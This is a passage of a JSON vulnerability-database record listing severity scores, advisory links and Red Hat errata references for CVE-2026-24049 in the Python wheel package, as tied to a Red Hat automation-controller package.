"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/wheel/commit/934fe177ff912c8e03d5ae951d3805e1fd90ba5e" }, { "reference_url": "https://github.com/pypa/wheel/releases/tag/0.46.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-22T12:24:28Z/" } ], "url": "https://github.com/pypa/wheel/releases/tag/0.46.2" }, { "reference_url": "https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-22T12:24:28Z/" } ], "url": "https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24049", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24049" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126274", "reference_id": "1126274", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1126274" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431959", "reference_id": "2431959", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431959" }, { "reference_url": "https://github.com/advisories/GHSA-8rrh-rw8j-w5fx", "reference_id": "GHSA-8rrh-rw8j-w5fx", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-8rrh-rw8j-w5fx" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:10184", "reference_id": "RHSA-2026:10184", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:10184" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1504", "reference_id": "RHSA-2026:1504", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1504" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1902", "reference_id": "RHSA-2026:1902", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1902" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1939", "reference_id": "RHSA-2026:1939", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1939" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:1942", "reference_id": "RHSA-2026:1942", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:1942" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2090", "reference_id": "RHSA-2026:2090", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2090" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2106", "reference_id": "RHSA-2026:2106", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2106" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2139", "reference_id": "RHSA-2026:2139", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2139" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2675", "reference_id": "RHSA-2026:2675", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2675" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2681", "reference_id": "RHSA-2026:2681", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2681" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2694", "reference_id": "RHSA-2026:2694", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2694" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2695", "reference_id": "RHSA-2026:2695", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2695" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2710", "reference_id": "RHSA-2026:2710", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2710" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2754", "reference_id": "RHSA-2026:2754", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2754" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2762", "reference_id": "RHSA-2026:2762", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2762" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2823", "reference_id": "RHSA-2026:2823", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2823" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2865", "reference_id": "RHSA-2026:2865", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2865" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2866", "reference_id": "RHSA-2026:2866", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2866" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2900", "reference_id": "RHSA-2026:2900", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2900" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2925", "reference_id": "RHSA-2026:2925", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2925" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3461", "reference_id": "RHSA-2026:3461", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3461" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3462", "reference_id": "RHSA-2026:3462", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3462" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3713", "reference_id": "RHSA-2026:3713", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3713" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3782", "reference_id": "RHSA-2026:3782", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3782" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3958", "reference_id": "RHSA-2026:3958", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3958" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3959", "reference_id": "RHSA-2026:3959", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3959" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:3960", "reference_id": "RHSA-2026:3960", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:3960" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4185", "reference_id": "RHSA-2026:4185", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4185" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4215", "reference_id": "RHSA-2026:4215", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4215" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4271", "reference_id": "RHSA-2026:4271", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4271" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:4942", "reference_id": "RHSA-2026:4942", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:4942" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5119", "reference_id": "RHSA-2026:5119", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5119" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6192", "reference_id": "RHSA-2026:6192", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6192" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6555", "reference_id": "RHSA-2026:6555", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6555" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6562", "reference_id": "RHSA-2026:6562", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6562" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6565", "reference_id": "RHSA-2026:6565", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6565" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:7250", "reference_id": "RHSA-2026:7250", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:7250" }, { "reference_url": "https://usn.ubuntu.com/8221-1/", "reference_id": "USN-8221-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8221-1/" } ], "fixed_packages": [], "aliases": [ "CVE-2026-24049", "GHSA-8rrh-rw8j-w5fx" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fm8w-bycx-4yex" } ], "fixing_vulnerabilities": [], "risk_score": "4.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/automation-controller@4.6.26-1%3Farch=el9ap" }